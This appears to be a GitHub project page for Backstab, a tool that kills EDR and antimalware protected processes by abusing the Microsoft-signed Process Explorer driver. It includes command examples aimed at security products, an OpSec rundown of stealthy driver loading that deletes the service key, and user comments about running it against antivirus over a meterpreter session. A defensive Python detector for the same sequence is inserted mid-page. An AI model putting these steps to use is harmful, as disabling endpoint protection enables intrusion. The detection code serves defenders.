A tool to kill antimalware protected processes

Overview

Backstab

Kill EDR Protected Processes

Have local admin credentials but the EDR is standing in the way? Unhooking or direct syscalls are not working against the EDR? Well, why not just kill it? Backstab is a tool capable of killing antimalware protected processes by leveraging Sysinternals' Process Explorer (ProcExp) driver, which is signed by Microsoft.

What can it do?

Usage: backstab.exe <-n name || -p PID> [options]  
	-n,	Choose process by name, including the .exe suffix
	-p, 	Choose process by PID
	-l, 	List handles of protected process
	-k, 	Kill the protected process by closing its handles
	-x, 	Close a specific handle
	-d, 	Specify path to where ProcExp will be extracted
	-s, 	Specify service name registry key
	-u, 	Unload ProcExp driver
	-a, 	Adds SeDebugPrivilege
	-h, 	Print this menu

	Examples:
	backstab.exe -n cyserver.exe -k 			[kill cyserver]
	backstab.exe -n cyserver.exe -x E4C 		[Close handle E4C of cyserver]
	backstab.exe -n cyserver.exe -l 			[list all handles of cyserver]
	backstab.exe -p 4326 -k -d c:\driver.sys 	[kill protected process with PID 4326, extract ProcExp driver to C:\ drive]

How is that possible?

ProcExp has a signed kernel driver that it loads on startup, which allows it to close handles that cannot be closed even as an administrator. When you use the UI, you cannot kill a protected process, but you can close its handles, because the ProcExp UI instructs the kernel driver to close those handles. Backstab does the same thing, but without the UI element.

OpSec

Here is a quick rundown of what happens:

  1. Embedded driver is dropped to disk
  2. Registry key under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services is created
  3. The privilege SE_PRIVILEGE_ENABLED is acquired because it is necessary to load the driver
  4. Driver is loaded using NtLoadDriver to avoid creating a service
  5. The created Registry key is deleted (service not visible during execution)
  6. Communication with the driver is done via DeviceIoControl
  7. For handle enumeration, NtQuerySystemInformation is called

What you should also know

  1. The behavior of the tool mimics that of ProcExp. ProcExp drops the driver to disk, creates a registry key under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services, calls NtLoadDriver, and then deletes the registry key
  2. You can specify the location to which the driver is dropped and the service name
  3. When done, the app will unload the driver. The driver is unloaded by first re-creating the registry keys and then calling NtUnloadDriver
  4. The loaded driver is signed by MS
  5. The process does not attempt to directly close the protected process's handles; it instructs the ProcExp driver to close them. You won't be accused of attempting to tamper with any processes
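The rundown under OpSec and the notes above describe a sequence a defender can look for in endpoint telemetry: a .sys file written to disk by a user-mode process, a key created under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services, a driver load from the dropped path, and the key deleted again shortly after the load. The following Python is an added example, not code from Backstab or from Sysmon, that runs that correlation over a handful of constructed Sysmon-style events (event IDs 11 FileCreate, 12 RegistryEvent and 6 DriverLoad are real Sysmon IDs; the Event and Finding classes, the 60-second window, the service name ExampleSvc and every sample value are assumptions of this example).

```python
"""Correlate the driver-drop / service-key / NtLoadDriver / key-delete sequence
from Sysmon-style events.  Added example for this page, not part of Backstab or
Sysmon; the event shape and every sample value below are constructed."""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Optional, Tuple

# Sysmon writes registry paths as HKLM\SYSTEM\...; compare case-insensitively.
SERVICES_PREFIX = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\".lower()

# Sysmon event IDs used here: 11 FileCreate, 12 RegistryEvent (key
# create/delete), 6 DriverLoad.  DriverLoad carries no ProcessId, so the load
# is tied back to the dropping process through the file path instead.
FILE_CREATE, REG_KEY, DRIVER_LOAD = 11, 12, 6


@dataclass
class Event:
    ts: datetime
    event_id: int
    pid: int          # 0 for DriverLoad, which is not attributed to a process
    target: str       # file path (11), registry key (12), loaded image (6)
    op: str = ""      # for event 12: "CreateKey" or "DeleteKey"


@dataclass
class Finding:
    pid: int
    driver_path: str
    service_key: Optional[str] = None   # key created by pid shortly before the load
    key_deleted: bool = False           # key removed again after the load

    @property
    def severity(self) -> str:
        # A service key that vanishes right after the load matches the
        # "service not visible during execution" behaviour described above.
        return "high" if self.key_deleted else "medium"


def detect(events: List[Event], window: timedelta = timedelta(seconds=60)) -> List[Finding]:
    """Return one Finding per driver load from a freshly dropped .sys file."""
    drops: Dict[str, Tuple[int, datetime]] = {}   # lowercased .sys path -> (pid, ts)
    keys: Dict[Tuple[int, str], datetime] = {}    # (pid, lowercased key) -> create ts
    findings: List[Finding] = []
    for ev in sorted(events, key=lambda e: e.ts):
        t = ev.target.lower()
        if ev.event_id == FILE_CREATE and t.endswith(".sys"):
            drops[t] = (ev.pid, ev.ts)
        elif ev.event_id == REG_KEY and t.startswith(SERVICES_PREFIX):
            if ev.op == "CreateKey":
                keys[(ev.pid, t)] = ev.ts
            elif ev.op == "DeleteKey":
                keys.pop((ev.pid, t), None)
                for f in findings:
                    if f.pid == ev.pid and f.service_key == t:
                        f.key_deleted = True
        elif ev.event_id == DRIVER_LOAD and t in drops:
            pid, drop_ts = drops[t]
            if ev.ts - drop_ts <= window:
                key = next((k for (p, k), kts in keys.items()
                            if p == pid and ev.ts - kts <= window), None)
                findings.append(Finding(pid=pid, driver_path=ev.target, service_key=key))
    return findings


# Constructed sample telemetry: pid 4242 follows the sequence from the rundown,
# pid 700 is a normal service install whose driver loads from System32.
T0 = datetime(2022, 1, 1, 12, 0, 0)
SAMPLE_EVENTS = [
    Event(T0, FILE_CREATE, 4242, r"C:\driver.sys"),
    Event(T0 + timedelta(seconds=1), REG_KEY, 4242,
          r"HKLM\SYSTEM\CurrentControlSet\Services\ExampleSvc", "CreateKey"),
    Event(T0 + timedelta(seconds=2), DRIVER_LOAD, 0, r"C:\driver.sys"),
    Event(T0 + timedelta(seconds=5), REG_KEY, 700,
          r"HKLM\SYSTEM\CurrentControlSet\Services\BenignSvc", "CreateKey"),
    Event(T0 + timedelta(seconds=6), DRIVER_LOAD, 0, r"C:\Windows\System32\drivers\benign.sys"),
    Event(T0 + timedelta(seconds=3), REG_KEY, 4242,
          r"HKLM\SYSTEM\CurrentControlSet\Services\ExampleSvc", "DeleteKey"),
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"[{f.severity}] pid {f.pid} loaded {f.driver_path} "
              f"via key {f.service_key} (deleted after load: {f.key_deleted})")
```

The benign pid 700 never fires because its driver loads from a path no user-mode process just wrote; the pid 4242 sequence is reported at medium on the drop-then-load alone and raised to high once the service key disappears. Because ProcExp itself performs the same steps, the key deletion and the drop location (a user-writable path rather than the Sysinternals install directory) are what separate the tool from an interactive ProcExp session, so a real rule should also carry the signer and hash of the loaded image from the DriverLoad event.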

Further Research

While the tool's purpose is listing and closing handles, the opportunities are vast. It is possible to duplicate the handles into your own process instead of closing them. This could allow for deeper tampering where you write to files, fire events, or hold mutexes. To support further research, I tried to make the code readable and split it into many methods to facilitate reuse; I also left a description on all ProcExp related methods. Feel free to reach out to me on Twitter or by Email.

Credits

  • Author: Yasser Alhazmi (@Yas_o_h)
  • Pavel Yosifovich: (@Zodiacon) mentioned to us during his awesome Windows Internals Course that kernel drivers like ProcExp might cause too much unintended damage
  • Cornelis de Plaa @Cn33liz and Outflank Team @OutflankNL: for Ps-Tools and their outstanding Github repos, always informative
  • Mark Russinovich: for ProcExp, and all Sysinternals tools!
Comments
  • Could not connect to ProcExp device

    Hi! Any idea why this is happening? [image]

    Also, when dropping to a custom path, a new error appears: [image]

    I have compiled the project using the latest MSVC 16.10 on x64.

    opened by bgospodaru 5
  • Could not connect to ProcExp device: 5

    Not using administrator in cmd:

    C:\Users\mtest\Desktop>Backstab.exe -n OneDrive.exe -k -d c:\driver2.sys
    extracting the drive to c:\driver2.sys
    WriteResourceToDisk.CreateFile: 5
    SetRegistryValues.RegCreateKeyExA: 1300
    NtUnloadDriver.SetRegistryKeyValues: 1300
    Could not load driver: 1300

    C:\Users\mtest\Desktop>


    Using administrator in cmd:

    C:\Users\mtest\Desktop>Backstab.exe -n OneDrive.exe -k -d c:\driver2.sys
    extracting the drive to c:\driver2.sys
    ConnectToProcExpDevice: 5
    Could not connect to ProcExp device: 5

    C:\Users\mtest\Desktop>


    Using administrator in PowerShell:

    C:\Users\mtest\Desktop>Backstab.exe -n OneDrive.exe -k -d c:\driver2.sys
    extracting the drive to c:\driver2.sys
    ProcExpKillHandle.DeviceIoControl: 6
    ProcExpKillHandle.DeviceIoControl: 6
    ProcExpKillHandle.DeviceIoControl: 6
    ProcExpKillHandle.DeviceIoControl: 6
    ProcExpKillHandle.DeviceIoControl: 6
    ProcExpKillHandle.DeviceIoControl: 6
    ProcExpKillHandle.DeviceIoControl: 6
    ProcExpKillHandle.DeviceIoControl: 6


    Using administrator in cmd:

    C:\Users\mtest\Desktop>whoami /priv

    特权信息

    特权名 描述 状态
    ========================================= ================================== ======
    SeIncreaseQuotaPrivilege 为进程调整内存配额 已禁用
    SeSecurityPrivilege 管理审核和安全日志 已禁用
    SeTakeOwnershipPrivilege 取得文件或其他对象的所有权 已禁用
    SeLoadDriverPrivilege 加载和卸载设备驱动程序 已禁用
    SeSystemProfilePrivilege 配置文件系统性能 已禁用
    SeSystemtimePrivilege 更改系统时间 已禁用
    SeProfileSingleProcessPrivilege 配置文件单一进程 已禁用
    SeIncreaseBasePriorityPrivilege 提高计划优先级 已禁用
    SeCreatePagefilePrivilege 创建一个页面文件 已禁用
    SeBackupPrivilege 备份文件和目录 已禁用
    SeRestorePrivilege 还原文件和目录 已禁用
    SeShutdownPrivilege 关闭系统 已禁用
    SeDebugPrivilege 调试程序 已禁用
    SeSystemEnvironmentPrivilege 修改固件环境值 已禁用
    SeChangeNotifyPrivilege 绕过遍历检查 已启用
    SeRemoteShutdownPrivilege 从远程系统强制关机 已禁用
    SeUndockPrivilege 从扩展坞上取下计算机 已禁用
    SeManageVolumePrivilege 执行卷维护任务 已禁用
    SeImpersonatePrivilege 身份验证后模拟客户端 已启用
    SeCreateGlobalPrivilege 创建全局对象 已启用
    SeIncreaseWorkingSetPrivilege 增加进程工作集 已禁用
    SeTimeZonePrivilege 更改时区 已禁用
    SeCreateSymbolicLinkPrivilege 创建符号链接 已禁用
    SeDelegateSessionUserImpersonatePrivilege 获取同一会话中另一个用户的模拟令牌 已禁用

    C:\Users\mtest\Desktop>

    I think the problem is caused by SeDebugPrivilege being disabled in the cmd administrator context. Could the program check for SeDebugPrivilege, or enable the SeDebugPrivilege privilege itself?

    opened by wgetnz 3
  • Could not connect to ProcExp device: 5

    D:\Users\max\Desktop\git\Backstab-master\x64\Release>backstab.exe -n avpui.exe -k
    no special driver dir specified, extracting to current dir
    WriteResourceToDisk.CreateFile: 32
    ConnectToProcExpDevice: 5
    Could not connect to ProcExp device: 5

    Windows 10 1909 x64

    opened by wgetnz 1
  • Clean-up

    Adding unloading driver and removing the extracted driver (it's cleaner). Had to get the handle out in order to be able to close it at the end of the operation. I left that SetDebugPrivilege but commented it out. To be checked further.

    opened by k4nfr3 0
  • How to use this in real scenario?

    Assuming I have an authority system meterpreter session active on a remote target and I want to kill the Avast process (which is secured by self-defense), does Backstab work on a remote target system?

    opened by czonta96 2
Releases: v1.0.1-beta
Owner: Yasser